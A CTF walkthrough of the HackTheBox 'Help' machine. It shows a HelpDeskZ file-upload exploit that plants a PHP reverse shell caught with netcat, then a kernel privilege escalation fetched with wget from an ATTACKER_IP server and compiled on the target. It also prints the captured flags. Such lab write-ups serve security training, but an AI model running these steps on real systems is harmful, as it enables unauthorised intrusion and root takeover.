htb-writeups

Help HTB - Walkthrough

Overview

This documentation provides a comprehensive walkthrough of the penetration testing process for the Help machine from HackTheBox. The box involves web application exploitation, privilege escalation, and kernel vulnerability exploitation.

Reconnaissance

Initial Scanning

export target=10.129.230.159
echo "Target IP set to: $target"

# Comprehensive port scan
sudo nmap -p- --min-rate 5000 -sT -vvv $target

# Service and version detection
sudo nmap -sC -sV -p 22,80,3000 -T4 $target

Discovered Services:

• Port 22: SSH
• Port 80: HTTP (Apache)
• Port 3000: Node.js

Web Application Enumeration

# Add domain to hosts file
echo "$target help.htb" | sudo tee -a /etc/hosts

Directory bruteforcing

Key Discovery: /support directory hosting HelpDeskZ application.

Vulnerability Analysis

HelpDeskZ Version Identification

The HelpDeskZ version was identified by accessing:

http://help.htb/support/readme.html

Searchsploit Research

searchsploit helpdeskz

Identified Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload (ExploitDB ID: 40300)

Exploitation

File Upload Vulnerability

1. Download the exploit:

   searchsploit -m 40300
   

1. Upload PHP reverse shell through the ticket submission form:

   http://help.htb/support/?v=submit_ticket&action=displayForm
   

1. Execute the uploaded shell:

# Generate shell URL using the exploit
python2 40300.py http://help.htb/support/uploads/tickets/ shell.php

# Set up listener
nc -nlvp 9001

# Trigger the shell
curl http://help.htb/support/uploads/tickets/[GENERATED_HASH].php

Initial Access

Successfully obtained a shell as user help:

whoami
# help

cat /home/help/user.txt
# c4a45fefa1e4dcd8ddcca8777ab9ffde

Privilege Escalation

System Information Gathering

uname -a
# Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Kernel Exploitation

Vulnerability: Linux Kernel 4.4.0-116 Generic Privilege Escalation

1. Download and compile the exploit:

# On attacker machine
python3 -m http.server

# On target machine
wget http://ATTACKER_IP:8000/44298.c -O exploit.c
gcc -o exploit exploit.c

1. Execute the exploit:

   ./exploit
   

Root Access

Successfully elevated to root privileges:

whoami
# root

cat /root/root.txt
# 8df818bc2013e9b03c18234fdd0449b6

Technical Details

Vulnerabilities Exploited

1. HelpDeskZ Arbitrary File Upload (CVE-2015-0937)
   • Impact: Remote Code Execution
   • Vector: Unrestricted file upload in ticket attachments
2. Linux Kernel Privilege Escalation
   • CVE: Multiple vulnerabilities in Linux Kernel 4.4.0-116
   • Impact: Local Privilege Escalation to root

Key Learning Points

• Web application directory enumeration
• HelpDeskZ vulnerability research and exploitation
• File upload restriction bypass techniques
• Kernel version identification and exploitation
• Privilege escalation methodology

Mitigation Recommendations

1. HelpDeskZ:
   • Update to latest version
   • Implement proper file upload validation
   • Restrict executable file types
2. System Hardening:
   • Regular kernel updates and patches
   • Principle of least privilege for service accounts
   • Web application firewall implementation

Tools Used

• Nmap - Network scanning
• Dirb - Directory enumeration
• Searchsploit - Vulnerability research
• Netcat - Reverse shell handling
• GCC - Exploit compilation

---

This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting penetration testing activities.